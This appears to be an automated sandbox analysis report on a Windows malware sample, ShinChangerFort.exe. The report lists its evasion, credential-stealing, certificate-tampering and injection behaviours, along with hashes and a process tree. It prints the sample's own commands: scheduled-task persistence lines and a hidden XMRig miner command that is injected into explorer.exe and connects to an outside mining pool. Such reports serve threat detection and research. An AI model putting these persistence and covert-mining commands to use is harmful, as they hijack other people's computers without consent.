xmrig | 0f072c9ed41be4f8a023d20af8e0a49f432a27e74e79cfb434270c0c87ea9e85

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-en-20211014
submitted
16-10-2021 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ShinChangerFort.exe
Size

3.1MB
MD5

9160e2fa867538422a7d9f3d948e91c5
SHA1

9751ad4f294ff8d7c067378f09288e7d142ee3ae
SHA256

0f072c9ed41be4f8a023d20af8e0a49f432a27e74e79cfb434270c0c87ea9e85
SHA512

2451a4448020842f017bb330c456529c5369d831021cbceffc832668f76b3f15aef706378695800877a6c6fc0d5df90d469f2eb1d8c395c8dd6613a24ab42714

Score

10^/10

xmrig discovery evasion miner spyware stealer themida trojan

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/972-311-0x000000014030F3F8-mapping.dmp	xmrig
behavioral1/memory/972-313-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

fl.exef1_prot.exeservices64.exef2_prot.exesihost64.exeservices32.exesihost32.exe

pid process

1804 fl.exe
1552 f1_prot.exe
988 services64.exe
1484 f2_prot.exe
1056 sihost64.exe
1952 services32.exe
560 sihost32.exe

pid	process
1804	fl.exe
1552	f1_prot.exe
988	services64.exe
1484	f2_prot.exe
1056	sihost64.exe
1952	services32.exe
560	sihost32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ShinChangerFort.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ShinChangerFort.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ShinChangerFort.exe

Loads dropped DLL 7 IoCs

Processes:

ShinChangerFort.exefl.exef1_prot.exeservices64.exef2_prot.exeservices32.exe

pid process

1108 ShinChangerFort.exe
1804 fl.exe
1552 f1_prot.exe
1804 fl.exe
988 services64.exe
1484 f2_prot.exe
1952 services32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1108-58-0x0000000000ED0000-0x0000000000ED1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

ShinChangerFort.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ShinChangerFort.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

ShinChangerFort.exe

pid process

1108 ShinChangerFort.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 988 set thread context of 972 988 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1216 schtasks.exe
1052 schtasks.exe
1108 schtasks.exe
1608 schtasks.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ShinChangerFort.exe

description	pid	process	target process
PID 988 set thread context of 972	988	services64.exe	explorer.exe

pid	process
1216	schtasks.exe
1052	schtasks.exe
1108	schtasks.exe
1608	schtasks.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

services64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

ShinChangerFort.exef1_prot.exeservices64.exef2_prot.exeservices32.exeexplorer.exe

pid	process
1108	ShinChangerFort.exe
1552	f1_prot.exe
988	services64.exe
1484	f2_prot.exe
1952	services32.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe
972	explorer.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

ShinChangerFort.exef1_prot.exeservices64.exef2_prot.exeservices32.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1108	ShinChangerFort.exe
Token: SeDebugPrivilege	1552	f1_prot.exe
Token: SeDebugPrivilege	988	services64.exe
Token: SeDebugPrivilege	1484	f2_prot.exe
Token: SeDebugPrivilege	1952	services32.exe
Token: SeLockMemoryPrivilege	972	explorer.exe
Token: SeLockMemoryPrivilege	972	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ShinChangerFort.exefl.exef1_prot.execmd.exeservices64.exef2_prot.execmd.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 1108 wrote to memory of 1804	1108	ShinChangerFort.exe	fl.exe
PID 1108 wrote to memory of 1804	1108	ShinChangerFort.exe	fl.exe
PID 1108 wrote to memory of 1804	1108	ShinChangerFort.exe	fl.exe
PID 1108 wrote to memory of 1804	1108	ShinChangerFort.exe	fl.exe
PID 1804 wrote to memory of 1552	1804	fl.exe	f1_prot.exe
PID 1804 wrote to memory of 1552	1804	fl.exe	f1_prot.exe
PID 1804 wrote to memory of 1552	1804	fl.exe	f1_prot.exe
PID 1804 wrote to memory of 1552	1804	fl.exe	f1_prot.exe
PID 1552 wrote to memory of 1572	1552	f1_prot.exe	cmd.exe
PID 1552 wrote to memory of 1572	1552	f1_prot.exe	cmd.exe
PID 1552 wrote to memory of 1572	1552	f1_prot.exe	cmd.exe
PID 1572 wrote to memory of 1216	1572	cmd.exe	schtasks.exe
PID 1572 wrote to memory of 1216	1572	cmd.exe	schtasks.exe
PID 1572 wrote to memory of 1216	1572	cmd.exe	schtasks.exe
PID 1552 wrote to memory of 988	1552	f1_prot.exe	services64.exe
PID 1552 wrote to memory of 988	1552	f1_prot.exe	services64.exe
PID 1552 wrote to memory of 988	1552	f1_prot.exe	services64.exe
PID 1804 wrote to memory of 1484	1804	fl.exe	f2_prot.exe
PID 1804 wrote to memory of 1484	1804	fl.exe	f2_prot.exe
PID 1804 wrote to memory of 1484	1804	fl.exe	f2_prot.exe
PID 1804 wrote to memory of 1484	1804	fl.exe	f2_prot.exe
PID 988 wrote to memory of 976	988	services64.exe	cmd.exe
PID 988 wrote to memory of 976	988	services64.exe	cmd.exe
PID 988 wrote to memory of 976	988	services64.exe	cmd.exe
PID 1484 wrote to memory of 1296	1484	f2_prot.exe	cmd.exe
PID 1484 wrote to memory of 1296	1484	f2_prot.exe	cmd.exe
PID 1484 wrote to memory of 1296	1484	f2_prot.exe	cmd.exe
PID 1296 wrote to memory of 1052	1296	cmd.exe	schtasks.exe
PID 1296 wrote to memory of 1052	1296	cmd.exe	schtasks.exe
PID 1296 wrote to memory of 1052	1296	cmd.exe	schtasks.exe
PID 976 wrote to memory of 1108	976	cmd.exe	schtasks.exe
PID 976 wrote to memory of 1108	976	cmd.exe	schtasks.exe
PID 976 wrote to memory of 1108	976	cmd.exe	schtasks.exe
PID 988 wrote to memory of 1056	988	services64.exe	sihost64.exe
PID 988 wrote to memory of 1056	988	services64.exe	sihost64.exe
PID 988 wrote to memory of 1056	988	services64.exe	sihost64.exe
PID 1484 wrote to memory of 1952	1484	f2_prot.exe	services32.exe
PID 1484 wrote to memory of 1952	1484	f2_prot.exe	services32.exe
PID 1484 wrote to memory of 1952	1484	f2_prot.exe	services32.exe
PID 1952 wrote to memory of 1052	1952	services32.exe	cmd.exe
PID 1952 wrote to memory of 1052	1952	services32.exe	cmd.exe
PID 1952 wrote to memory of 1052	1952	services32.exe	cmd.exe
PID 1052 wrote to memory of 1608	1052	cmd.exe	schtasks.exe
PID 1052 wrote to memory of 1608	1052	cmd.exe	schtasks.exe
PID 1052 wrote to memory of 1608	1052	cmd.exe	schtasks.exe
PID 1952 wrote to memory of 560	1952	services32.exe	sihost32.exe
PID 1952 wrote to memory of 560	1952	services32.exe	sihost32.exe
PID 1952 wrote to memory of 560	1952	services32.exe	sihost32.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe
PID 988 wrote to memory of 972	988	services64.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe
"C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe"
1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108

C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1804

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:1216

C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:1108

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
- Executes dropped EXE
PID:1056

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:1052

C:\Users\Admin\AppData\Local\Temp\services32.exe
"C:\Users\Admin\AppData\Local\Temp\services32.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
6⤵
- Creates scheduled task(s)
PID:1608

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
5⤵
- Executes dropped EXE
PID:560

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
a6a22f0058bf77c54e55e65a557af512

SHA1
ec9bec7680e92713781d90604f9aa76a589332b4

SHA256
1a42574f9a8b11d0164f5c0b5a5c9cacd53df08dfe12c6e0228978ec7bd23a0e

SHA512
c84510ceb2e1ee9f95e291f45faf3dd3c9da86d2583045f2634f12a14167857ab378101a01727a29891edaadb6fe3bb4d15d221a6ad32f85a65e249c7475ae36

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
MD5
b9bedc94ab68cf2423606bab657fe343

SHA1
f9d3fe51e13db292ba1954cfb9238973de62beea

SHA256
334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

SHA512
8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
MD5
a21c6db90ee62cc05755c7aba5bfb33b

SHA1
0a39285f50527fd028eb81016f20a0a597afa24b

SHA256
81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

SHA512
a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

Download Submit
C:\Users\Admin\AppData\Local\Temp\fl.exe
MD5
8b1011bf4b9dc38d8aececd4ed9e11c6

SHA1
9d04f1d07eb61b8cd6ae26be619b409ba0581ede

SHA256
5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

SHA512
9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

Download Submit
C:\Users\Admin\AppData\Local\Temp\fl.exe
MD5
8b1011bf4b9dc38d8aececd4ed9e11c6

SHA1
9d04f1d07eb61b8cd6ae26be619b409ba0581ede

SHA256
5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

SHA512
9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

Download Submit
C:\Users\Admin\AppData\Local\Temp\services32.exe
MD5
a21c6db90ee62cc05755c7aba5bfb33b

SHA1
0a39285f50527fd028eb81016f20a0a597afa24b

SHA256
81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

SHA512
a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe
MD5
b9bedc94ab68cf2423606bab657fe343

SHA1
f9d3fe51e13db292ba1954cfb9238973de62beea

SHA256
334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

SHA512
8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
5a9eee34a0fdce1056388e807726a03c

SHA1
c6b401b54e262651c2b70f7c9093c7ac3e57456b

SHA256
116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

SHA512
747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
5a9eee34a0fdce1056388e807726a03c

SHA1
c6b401b54e262651c2b70f7c9093c7ac3e57456b

SHA256
116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

SHA512
747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
ef1d47ed149037d47b6fea6dad01950b

SHA1
df39278003c6a9bb3c8e8c420f39faf2aa953f07

SHA256
201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

SHA512
3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
ef1d47ed149037d47b6fea6dad01950b

SHA1
df39278003c6a9bb3c8e8c420f39faf2aa953f07

SHA256
201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

SHA512
3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

Download Submit
\??\c:\users\admin\appdata\local\temp\rarsfx0\f1_prot.exe
MD5
